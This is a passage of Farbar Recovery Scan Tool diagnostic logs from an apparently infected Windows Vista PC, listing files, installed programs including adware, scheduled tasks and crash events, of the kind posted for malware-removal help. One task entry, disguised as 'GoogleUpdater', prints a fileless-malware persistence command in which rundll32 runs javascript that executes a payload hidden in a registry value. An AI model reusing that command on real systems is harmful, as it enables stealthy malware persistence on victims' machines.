C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles 2014-12-05 21:19 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-12-05 21:10 - 2014-06-08 13:02 - 00037648 _____ () C:\Windows\PFRO.log 2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic 2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung 2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia 2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe 2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox 2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google 2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google 2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394 2014-11-13 14:25 - 2014-10-16 07:42 - 00000000 ____D () C:\Program Files\CouponArific 2014-11-13 14:25 - 2014-10-16 07:42 - 00000000 ____D () C:\Program Files\35556262-902E-49AE-8622-66E14F1F041C 2014-11-13 14:25 - 2013-10-26 18:28 - 00000000 ____D () C:\Program Files\WiseConvert_1.3_B2 2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache 2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET 2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk 2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE 2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT 2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG 2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini 2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp 2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin 2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe Files to move or delete: ==================== C:\Users\finja\remove.exe Some content of TEMP: ==================== C:\Users\finja\AppData\Local\Temp\Quarantine.exe C:\Users\finja\AppData\Local\Temp\sqlite3.dll ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signed C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-12-05 21:52 ==================== End Of Log ============================ Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x86) Version: 03-12-2014
Ran by finja at 2014-12-06 09:22:25
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version: - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version: - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version: - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version: - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version: - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version: - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version: - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version: - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version: - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version: - )
LightScribe 1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version: - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version: - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version: - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version: - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version: - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version: - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll (Microsoft Corporation)
==================== Restore Points =========================
05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
Task: {B30E872D-50B8-4BC9-97FA-EE9C0D46B1D1} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
==================== Loaded Modules (whitelisted) =============
2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (12/05/2014 09:43:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (12/05/2014 09:15:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung explorer.exe, Version 6.0.6002.18005, Zeitstempel 0x49e01da5, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x00aab3d6,
Prozess-ID 0xb50, Anwendungsstartzeit explorer.exe0.
Error: (12/05/2014 09:13:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung Reader_sl.exe, Version 10.1.12.15, Zeitstempel 0x54083e61, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xf1c, Anwendungsstartzeit Reader_sl.exe0.
Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung ehtray.exe, Version 6.0.6001.18000, Zeitstempel 0x4791938f, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xf24, Anwendungsstartzeit ehtray.exe0.
Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung msseces.exe, Version 4.6.305.0, Zeitstempel 0x53f79c0e, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xeb0, Anwendungsstartzeit msseces.exe0.
Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung igfxpers.exe, Version 8.15.10.2202, Zeitstempel 0x4c756824, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xe88, Anwendungsstartzeit igfxpers.exe0.
Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung igfxtray.exe, Version 8.15.10.2202, Zeitstempel 0x4c75683c, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xe4c, Anwendungsstartzeit igfxtray.exe0.
Error: (12/05/2014 09:12:31 PM) (Source: WinMgmt) (EventID: 10) (User: )
